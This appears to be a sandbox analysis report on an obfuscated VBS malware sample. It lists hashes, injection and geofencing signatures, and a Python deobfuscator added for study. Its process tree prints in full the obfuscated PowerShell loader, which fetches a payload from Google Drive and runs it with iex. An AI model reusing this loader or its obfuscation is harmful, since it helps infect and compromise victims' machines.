Analysis

max time kernel: 147s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29/03/2024, 02:11

Static task: static1
Behavioral task: behavioral1
  Sample: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
  Resource: win10v2004-20231215-en

General

Target: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
Size: 179KB
MD5: 9cc4d241f55c4430d7ca7245c585253e
SHA1: 64497621d3145749d5d5b284448f8d7f90aa3e29
SHA256: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
SHA512: 4a058df7f657a75287b4d2a5a238469a83df4f160e246ea2240eedcf01bbf3d216a304e6cf0dba218c7a922099e60637e5650fe7f8037d350545939d0168f8f3
SSDEEP: 3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyc:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVR
Malware Config

Signatures

Blocklisted process makes network request (1 IoC)
  flow 5, PID 2908, process WScript.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation (by WScript.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 18: drive.google.com
  flow 19: drive.google.com

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
  PID 1560 WerFault.exe, target PID 4384 (procid_target 90)

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  PID 2364 powershell.exe (2 hits); PID 4384 powershell.exe (3 hits)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 2364 powershell.exe
  Token: SeDebugPrivilege, PID 4384 powershell.exe

Suspicious use of WriteProcessMemory (10 IoCs)
  PID 2908 (WScript.exe) wrote to memory of 2364 (procid_target 85), 2 hits
  PID 2364 (powershell.exe) wrote to memory of 4680 (procid_target 87), 2 hits
  PID 2364 (powershell.exe) wrote to memory of 4384 (procid_target 90), 3 hits
  PID 4384 (powershell.exe) wrote to memory of 4152 (procid_target 91), 3 hits
Processes

(depth 1) C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 2908
(depth 2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2364
(depth 3) C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
  PID: 4680
(depth 3) C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (32-bit PowerShell, re-launched with the same script)
  Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 4384

(depth 4) C:\Windows\SysWOW64\cmd.exe (the system32 path in the command line is redirected to SysWOW64 for the 32-bit parent)
  Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
  PID: 4152
(depth 4) C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 2632
  - Program crash
  PID: 1560

(depth 1) C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4384 -ip 4384
  PID: 4460
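Both powershell.exe command lines above build every meaningful string at run time. $Duefalks comes from `cmd /c set /A 115^^0`: inside cmd the doubled caret is an escaped `^`, so SET /A evaluates 115 XOR 0 = 115, which `[char]` turns into 's'; glued to 'ubstring' that yields the method name `substring`. Genanvendelsesprocessens then walks each junk-padded literal from index 7 in steps of 8 (the `For($Duplikeringscentral=7; ...; +=8)` loop), taking one character per step and stopping one short of the end because Spiderweb returns `Length-1`. Alfridaric invokes the result through $Forsmdeligheder, which decodes to `iex`. The Python below is an added example, not part of this sandbox report or of the sample: it re-implements that extraction statically over the three single-line literals copied verbatim from the command line (the literals that the page splits across several lines are left out). The regex and function names are mine; the offset and step are the ones read off the loop.

```python
import re

# Constructed excerpt: the three single-line assignments copied verbatim from the
# powershell.exe command line in the process tree above.
SCRIPT_EXCERPT = (
    "$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';"
    "$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';"
    "$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';"
)


def key_char(cmd_expr: str = "115^^0") -> str:
    """Evaluate the `cmd /c set /A 115^^0` trick.

    cmd treats ^^ as an escaped caret, so SET /A sees 115^0, i.e. 115 XOR 0 = 115.
    PowerShell casts that to [char], giving 's'; 's' + 'ubstring' is the method
    the decoder later calls on every literal.
    """
    left, right = cmd_expr.replace("^^", "^").split("^")
    return chr(int(left) ^ int(right))


def decode_literal(blob: str, start: int = 7, step: int = 8) -> str:
    """Replicate Genanvendelsesprocessens.

    The For loop starts at index 7, advances by 8 and runs while the index is
    less than Spiderweb(blob) == len(blob) - 1, so the final character of each
    literal (a padding space in this sample) is never read.
    """
    limit = len(blob) - 1
    return "".join(blob[i] for i in range(start, limit, step))


def decode_assignments(script: str) -> dict:
    """Find every `$Name=Genanvendelsesprocessens '...'` and decode the literal."""
    pattern = re.compile(r"\$(\w+)=Genanvendelsesprocessens '([^']*)'")
    return {name: decode_literal(blob) for name, blob in pattern.findall(script)}


if __name__ == "__main__":
    # Assumed usage: dump the decoded variables for the excerpt above.
    print("method name:", key_char() + "ubstring")
    for name, value in decode_assignments(SCRIPT_EXCERPT).items():
        print(f"${name} = {value!r}")
```

Decoding $Skeetskydning yields a drive.google.com download URL, which matches flows 18 and 19 in the signatures section; $Forsmdeligheder decodes to the command Alfridaric uses to evaluate each decoded fragment. To apply the same extraction to the multi-line literals, join the split command line back into one string before running the regex.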
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 5KB
  MD5: 41077e923293898955e78267b7878339
  SHA1: 36083128a00b83103bfe8bc36b0042ff6a703012
  SHA256: 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0
  SHA512: 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922

File 2
  Filesize: 6KB
  MD5: a45ba0d9e34080482621cd2538f9b4f8
  SHA1: d76f3ecbe487e2a2ce081d59966b546811e517dc
  SHA256: 3f76198c3a8aa09768b853a462a13de2c4302761f0c2d34de5f761e59033f471
  SHA512: a7da77f44be0a7ac8834551b9d3133eb46b65489a1d55df69a3e7039dafcc65d36aeaf5c9efdef4acbe454a852c6c377071c3ce84f47cbdd38eece2d776d8d16

File 3
  Filesize: 2KB
  MD5: 431dee567c8386cb30dba8162227f153
  SHA1: 819be3b532ceb44a8f39a795494f822e61c76ec8
  SHA256: 9d6611a404f78948afd12a529462e776b597216139365b3a3f0c0c765e03ff7b
  SHA512: e33ebdf090896fd82ad1f9f40ba99af5c5dc60763c0e64278dc0b2a94df31ccf326ff51553bd905caf35354968cec268fe2f0022ccaf650061e8dc504113cdc5

File 4
  Filesize: 1KB
  MD5: 66dbe46189a99a73b9346672d34c3138
  SHA1: 2818445ada528c9fd9c04c95369039adde8f6708
  SHA256: 44446099d2fb29ec6c60d5ab1490eeb9f0a35b1e620342c2fb3ea49354bcc61f
  SHA512: b11b12e3859b2092ea8455af5de1e0e15210325e0ad8bd6a51ef6d1cb0f3925480e73342e1c41320060bbf38adea1e6f135628c8087a6c05b37c0330c1fed6ac

File 5
  Filesize: 2KB
  MD5: d66a3ee0adf3cab478770229c65f1325
  SHA1: 7a346f32392b488ff8ffe1e04b418162ee122f69
  SHA256: aeaf13cb0a80ec05e8aebd26fd84b6c14ee6339dcc6012ffae69b0ac9b483d83
  SHA512: f38ffb82f54a2d1fd6d833358361879395d0f02860754e1c2dc3bf70d8f572a0a1d757accdd5622071498da32ee2195b57d3c4bba97cd39ce2a8ae86e5e37d07

File 6
  Filesize: 1KB
  MD5: 6fa3bc0693f9b25f755076e62bd16488
  SHA1: d77b88b84c54212206c1bb64b53030b72a090b46
  SHA256: 77440d6aa22f460064cdbe56994ea71dfe93ab1db91ec5129095d84a4ccfeaf7
  SHA512: 25e75355d43215518d3f95944d68ac515170a1360cd0ef75cb3cfffb94c0b85749917e219c039fb35a81789f1fcb245e4f9f3172295c65b936abd64e23240d3f

File 7
  Filesize: 3KB
  MD5: 574c55c3664ae5736b02b985575ef8fd
  SHA1: d6a5ae6ec2186d56e429f0d6d9a820a64ea2e5bd
  SHA256: 4187466f21a6a3c69282e6bf476b5d33b13304b7a60f724cc5b0bbb5d0c0aed1
  SHA512: 0e03f11815aa0118369b9f33aea1ba65887130cdc7e7dbd819c4949d0dc38e3a3734395c10f491c25efd7007e80ea205c1944f352e8339ffc46543c9e42468d3

File 8
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82